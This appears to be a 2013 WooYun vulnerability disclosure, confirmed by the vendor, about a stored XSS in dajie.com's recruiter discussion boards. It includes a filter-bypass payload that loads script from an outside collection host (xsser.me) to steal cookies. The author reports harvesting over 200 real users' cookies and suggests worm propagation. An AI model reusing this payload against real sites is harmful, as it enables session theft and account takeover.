漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-018266
漏洞标题:继续大街网储存型XSS,可以XSS在其招聘的的任意一个公司,可以盗号、蠕虫~o(╯□╰)o
相关厂商:大杰世纪科技发展(北京)有限公司
漏洞作者: px1624
提交时间:2013-02-02 12:41
修复时间:2013-03-19 12:41
公开时间:2013-03-19 12:41
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-02-02: 细节已通知厂商并且等待厂商处理中
2013-02-04: 厂商已经确认,细节仅向厂商公开
2013-02-14: 细节向核心白帽子及相关领域专家公开
2013-02-24: 细节向普通白帽子公开
2013-03-06: 细节向实习白帽子公开
2013-03-19: 细节向公众公开
简要描述:
其实这个漏洞早在一个月之前就发现了,只是想用这个测试下能不能xss到搜狗,但是搜狗的抓数据也太慢了,足足抓了一个月,今天去看了下,终于抓到了,看了下没啥大的利用价值,所以现在就把这个洞给提交下~~
详细说明:
1 这个属于之前提交的一个洞,修补的不够彻底。
之前的漏洞 WooYun: 大街网 非你莫属官网某板块储存型XSS,可以盗取用户cookie
2 修补之后,过滤掉了script,限制了长度,判断了提交图片地址中原地址的字符串是否存在,判断了图片的结尾是不是.jpg(.png .gif)之类的字符。
3 绕过方法很简单,由于网站有用到jq,所以直接用jq的函数即可在长度限制范围内构造XSS。直接将以下代码添加到原图片地址的src后面即可。
"onload="jQuery.getScript('http://xsser.me/t0Oy9U?'+Math.random())".jpg
图1
F12中复制出来的代码
<img src="http://fs3u.dajie.com/2013/01/07/085/13575224858054398m.png" onload="jQuery.getScript('http://xsser.me/t0Oy9U?'+Math.random())" .png"="" border="0">
4 之前只是在大街网《非你莫属》板块发现了这个,这次去看了下,所有的大街网的厂商(招聘公司)的讨论区中,因为调用的都是同一套发帖子的代码,故均存在这个漏洞。
图2 3 4
5 xss到的cookie,我只在非你莫属板块插了一个,就xss到了200多条~
图6 7
6 这个貌似是一个管理员(版主)的,可以看到有可管理的操作。
图8 9
7 可以看到大街网的招聘公司还是很多的,所以直接随便xss下管理员的账号之后,发布一些虚假的招聘信息,或者广告信息的话,危害还是蛮大的!!
图5
8 再看下发帖子的post数据,没有key、token这种东西,发帖子也没有验证码。这个意味着神马?
大家懂得,蠕虫不解释~~
蠕虫利用由于我这个帖子内容已经太长了,所以大家看这个帖子的利用方法和证明吧。
WooYun: 大街网某功能储存型XSS,导致可以在首页等位置蠕虫 + 盗取用户登录cookie
图10
漏洞证明:
看上面描述证明。
修复方案:
过滤~ 吼吼~~~
版权声明:转载请注明来源 px1624@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2013-02-04 14:35
厂商回复:
感谢您对大街网的支持,我们会尽快查证修复~
最新状态:
暂无